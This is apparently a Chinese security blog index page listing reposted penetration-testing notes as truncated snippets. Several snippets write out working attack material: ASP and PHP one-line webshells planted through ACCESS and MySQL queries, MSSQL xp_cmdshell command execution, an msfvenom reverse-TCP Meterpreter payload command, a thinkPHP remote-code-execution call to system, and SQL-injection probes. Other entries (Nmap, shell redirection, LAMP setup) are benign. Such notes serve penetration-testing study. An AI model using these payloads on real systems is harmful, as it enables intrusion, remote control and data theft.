- 博客(17)
- 收藏
- 关注
转载 Google Hacking
原文:klionsec基本命令intitle: 从网页标题中搜索指定的关键字inurl: 从url中搜索指定的关键字intext: 从网页中搜索指定的关键字filetype: 搜索指定的文件后缀site: 在某个指定的网站内搜索指定的内容link: 搜索与该链接有关的链接通配符+ 强制包含某个字...
2019-05-31 17:43:00
747
转载 PHP一些不一样的思路
大多数来自p牛SQL注入(left join)源代码<?php$link = mysqli_connect('localhost', 'root', 'root');mysqli_select_db($link, 'code');$table = addslashes($_GET['table']);$sql = "UPDATE `{$table}` ...
2019-05-31 01:15:00
395
转载 ACCESS渗透测试
access-getshell直接写shell# 创建临时表create table test(a varchar(255));# 插入一句话木马insert into test(a) values('<%execute request("a")>');# 写入文件(需要借助文件解析漏洞)select * into [a] in '目标文件路径.asp;.xls...
2019-05-29 17:35:00
364
转载 MSSQL渗透测试
mssql-getshell来源:独自等待,知乎,githubxp_cmdshell第一种:在SQL Server 2005之前版本中,xp_cmdshell是默认开启的,因此可以直接利用,执行系统命令exec master..xp_cmdshell 'whoami';第二种:先判断是否存在xp_cmdshell存储过程,返回1表示存在,否则表示不存在select cou...
2019-05-28 17:32:00
656
转载 Linux提权(持续更新)
利用/etc/passwd提权个人认为,这种提权方式在现实场景中难以实现,条件太过苛刻,但是建立Linux下的隐藏账户是个不错的选择,灵感来自:https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/利用条件拥有一个普通用户的权限普通用户有/etc/passwd的写权限...
2019-05-27 14:44:00
434
转载 MYSQL渗透测试
部分来源于:先知社区MYSQL-getshell篇通过日志getshell查看日志的物理路径(绝对路径)show variables like '%general%';打开日志记录内容set global general_log = on;重新设置日志路径(绝对路径)set global general_log_file = '日志绝对路径';写入webshell...
2019-05-26 15:18:00
1005
转载 msfvenom制作payload
windowsmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exemacmsfvenom -a x86 --plat...
2019-05-24 01:39:00
285
转载 thinkPHP命令执行漏洞
thinkPHP中反斜杠的作用是类库\命名空间命令执行的姿势通过反射invokefunction调用call_user_func_array方法,call_user_func_array函数接受两个参数,第一个为函数名,第二个为函数参数数组,如下所示,通过call_user_func_array函数调用system执行whoami函数?s=index/think\app/i...
2019-05-21 19:58:00
984
转载 MySQL获取webshell的几种方式
select ... into outfile需要满足的条件对web目录有写权限GPC关闭(GPC:是否对单引号转义)有绝对路径(读文件可以不用,写文件需要)没有配置secure-file-priv姿势有unionselect '<?php assert($_POST["cmd"]);?>’ into outfile '/home/wwwroot/sh...
2019-05-19 18:11:00
580
转载 meterpreter使用
原创来自:https://blog.youkuaiyun.com/wy_97/article/details/78838252系统命令基本命令# 查看当前获取的shellsessions -l# 进入指定的shellsessions -i <ID># 杀死会话sessions -k <ID># 进入目标cmdshell# 将当前会话放置后台back...
2019-05-08 14:48:00
254
转载 CVE-2017-11882利用
CVE-2017-11882是微软公布的远程执行漏洞,通杀所有office版本及Windows操作系统工具使用本文使用的EXP来源于unamer/CVE-2017-11882,然后结合MSF进行渗透内网一台Windows主机,要求安装Office外网一台Linux主机,要求安装了MSF,并且该主机拥有一个独立的公网IP(阿里云的主机虽然有公网IP,但是本身是处于内网的,在测试...
2019-05-08 10:50:00
199
转载 Nmap详解
扫描方式-Pn/-P0:扫描前不用ping测试目标是否可达,默认所有目标端口都可达-sT:TCP Connect扫描,进行完整的TCP三次握手,该类型扫描已被检测,且会在目标日志中记录大量连接请求和错误信息-sS:TCP SYN扫描,只会发送SYN包,简称半开扫描。使用者机器发送SYN请求给目标机器,若对方返回SYN|ACK包表明目标端口当前正在监听;若返回RST包表明目标端口未进...
2019-05-07 17:39:00
340
转载 Linux标准输入、标准输出、错误输出
Linux中的输入文件、输出文件、错误输出文件名称文件描述符标准输入0 (默认是键盘)标准输出1 (默认是屏幕)标准错误2 (默认是屏幕)输出重定向Linux中&表示后台运行,>表示输出重定向命令描述command > file标准输出重定向到文件中,文件不存在时会自动创建再写入,文件存在时会先...
2019-05-07 12:20:00
336
转载 ubuntu16.04搭建vulhub环境
简介Vulhub官方中文教程https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md环境:ubuntu16.04.5 python3安装必要软件ubuntu16.04.5默认安装python3(version:3.5),整个环境是在root环境下完成的安装pipcurl -s https://bootstra...
2019-05-06 11:38:00
1055
转载 SQL手工注入
快速判断是否存在SQL注入不能局限于这几种,要根据网站功能对应的SQL语句进行变化数字型注入http://www.evil.com/search?id=1 and 1=1 页面返回的结果与id=1时一样http://www.evil.com/search?id=1 and 1=2 页面返回结果为空或报错字符型注入http://www.evil.com/search?...
2019-04-25 12:28:00
185
转载 SQLMAP命令详解
Options--version:显示当前sqlmap的版本号-h:显示帮助信息-hh:显示详细的帮助信息-v VERBOSE:详细级别,VERBOSE为数字,默认为1Target-d DIRECT:直接连接到数据库-u URL或--url=URL:目标地址(URL)-l LOGFILE:从Burp或WebScarab代理的日志中解析目标-x SITEMAPURL:从一...
2019-04-25 11:27:00
1254
转载 ubuntu16.04搭建LAMP(独立安装)
修改APT源备份原文件source.listsudo cp /etc/source.list /etc/source.list.bak修改source.listsudo vi /etc/source.list阿里deb http://mirrors.aliyun.com/ubuntu/ xenial maindeb-src http://mirrors.aliyun.co...
2019-04-25 11:15:00
134
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人